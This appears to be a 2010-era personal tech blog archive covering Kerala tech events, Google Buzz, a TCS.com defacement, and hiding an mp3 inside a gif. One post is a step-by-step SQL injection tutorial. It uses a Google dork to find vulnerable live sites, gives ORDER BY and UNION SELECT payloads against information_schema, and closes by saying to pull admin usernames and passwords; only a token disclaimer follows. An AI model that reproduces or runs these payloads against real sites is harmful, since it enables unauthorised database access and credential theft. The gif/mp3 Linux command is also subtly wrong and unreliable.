Cochin Twestival 2010
Cochin Twestival 2010 will be held on March 25th, 2010 from 5 PM to 8 PM at Somewhere Else Cafe. Cochin Twestival is a mega tweet-up with lots of things added.
RSVP for Cochin Twestival
Hearing the word ‘Twestival’ for the first time?
It is a mega tweet-up with lots of things added. In short, it is a Twitter Festival. Twitter Festivals or Twestivals happen all around the globe once a year. There are basically two types of Twestivals: Twestival Global & Twestival Local. Twestival Global is one day, one cause all around the world and Twestival Local takes place over a weekend where cities are encouraged to support a local cause. Both versions have international momentum, but the real power of Twestival is when everything comes together on one day, giving focus to an important cause, the cause being different every year.
Venue
Twestival Cochin 2010 will be held at Somewhere Else Cafe. A map to the location is available at Twitter Kerala
Registration
You can register for the event in the Facebook Event Page.
BarCamp Kerala 8
BarCamp Kerala 8 will be held on 28 March, 2010 at MACFAST, Thiruvala. BarCamp Kerala or BCK is the biggest and coolest techy event in Kerala.
Hearing the word ‘barcamp’ for the first time?
BarCamp is an ad-hoc gathering born from the desire for people to share and learn in an open environment. It is an intense event with discussions, demos and interaction from participants who are the main actors of the event
Venue
BCK 8 will be at MACFAST, Thiruvala. For more details, go here
Registeration
You can register for the event in the BarCamp Kerala Site. As of yet we have 65 attendees.
Sessions
Till now we have 6 sessions. If you want to handle a sessions at BarCamp, you can add yourself in the sessions page.
BarCamp Kerala So Far…
If you are still undecided about coming to BarCamp Kerala, checkout these reports about the previous ones…
- First ever BarCamp in Kerala on November 24th, 2007
- BarCamp Kerala Part 5
- BarCamp Kerala 7 Live Blogging
- Barcamp Kerala LiveBlog
- BarCamp Kerala on May 3
Thanks to binnyva who wrote the BarCamp Kerala post Generator by which this very blog post was written.
How to perform a SQL injection?
First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.
Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.
1. Check the vulnerability by adding ‘ to the above link.
If you get an error message it means that the site is vulnerable to SQL injection.
Now you can be damn sure that the site is vulnerable to SQL injection.
2. Find out the number of columns
To find number of columns we use statement ORDER BY
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1– <– no error
http://www.site.com/abc.php?id=5 order by 2– <– no error
http://www.site.com/abc.php?id=5 order by 3– <– no error
http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ’4′ )
So we can conclude that the table have 4 columns
3. Check whether UNION function works or not
http://www.site.com/abc.php?id=5 union all select 1,2,3–
We will get a number on the screen. Lets say we get the number 2 at this step.
4. Check for MySQL version by replacing 2 in the above step by version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3–
Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.
// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //
5. Use information_schema
Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.
To get tables we use table_name and information_schema.tables
http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–
6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
//PLEASE DONT USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
How to turn off Buzz in Gmail?
Everyone have just started using Google buzz and many are still to contemplate it. Still the WebMonkey want to tell you about how to turn OFF the google buzz. So if you haven’t liked de BUZZZZZes in gmail, just follow the steps given below.
1. Login to GMAIL
2. Scroll down to the bottom of the page
3. Click the ‘Turn off Buzz’ link
Now what if you want the Google Buzz back. Just click the ‘ Turn on Buzz ‘ link at the bottom.
TCS.com hack exposes difference between Google public DNS and open DNS services
TCS.com belonging to Tata Consulatcny Services was hacked earlier todaya and it is claimed to be a attack over a DNS loophole.
Using nslookup, the diiference between Google public DNS and open DNS were studied.
On using nslookup for openDNS the result for both tcs.com and www.tcs.com were the same.
On using nslookup for Google public DNS the result for both tcs.com and www.tcs.com were different.
For www.tcs.com the Address was 205.178.152.154 while for tcs.com it was 216.15.200.140.
Thanks to Albins for pointing out the difference.
Official site of Tata Consultancy Services gets hacked by a French cracker
The website www.tcs.com which belongs to India’s IT giant Tata Consultancy Services gets hacked by a French hacker. When I write this post, the TCS group have not still resolved the problem. Itx more likely that it is not a web software hack,but an attack through DNS loophole.
If you visit TCS.com you will get a screenshot as shown below, telling that they have put up the domain name for sale.
Try out Google Experimental Search
‘Google Experimental Search’ !!!!!! Hearing it first for the time. It is another cool Google feature launched in May, 2007. Many believed that it is going to redefine the present search engines. Basicaly it has three provisons
- Google Social Search
- Keyboard Shortcuts
- Accessible View
You can try it at http://www.google.com/experimental/
Happy New Year to all Readers
Itx 6pm of January 1st,2010. Yes, I have been late in wishing you guys a Happy New Year.I take this opportunity to thank all our elite readers for your support during the year 2009 and wishing you all a very HAPPY NEW YEAR.
Hide mp3 in an image
Recently I had send my friends in orkut a scrap which had a image with some music file hidden in it. So now I am goin to reveal the secret behind it. It was actually a gif file with mp3 hidden in it.
Right click and save the above image and open it in winamp and feel the magic of X’mas..
So how do one combine a gif file with a mp3 file. The following are the steps for the same.
Step 1
Place both the gif file and mp3 file in the same directory. Letz call the directory XYZ
Step 2
Now take the command prompt by entering ‘CMD’ in the run window.
Step 3
Change the directory to XYZ by typing the following
cd path/XYZ
Step 4
Now type the following in the DOS prompt.
copy imageFileName.gif/b + musicFile.mp3/b combineFile.gif
If you are in Linux Terminal, type the following
cat imageFileName.gif musicFile.mp3 combineFile.gif
Get social
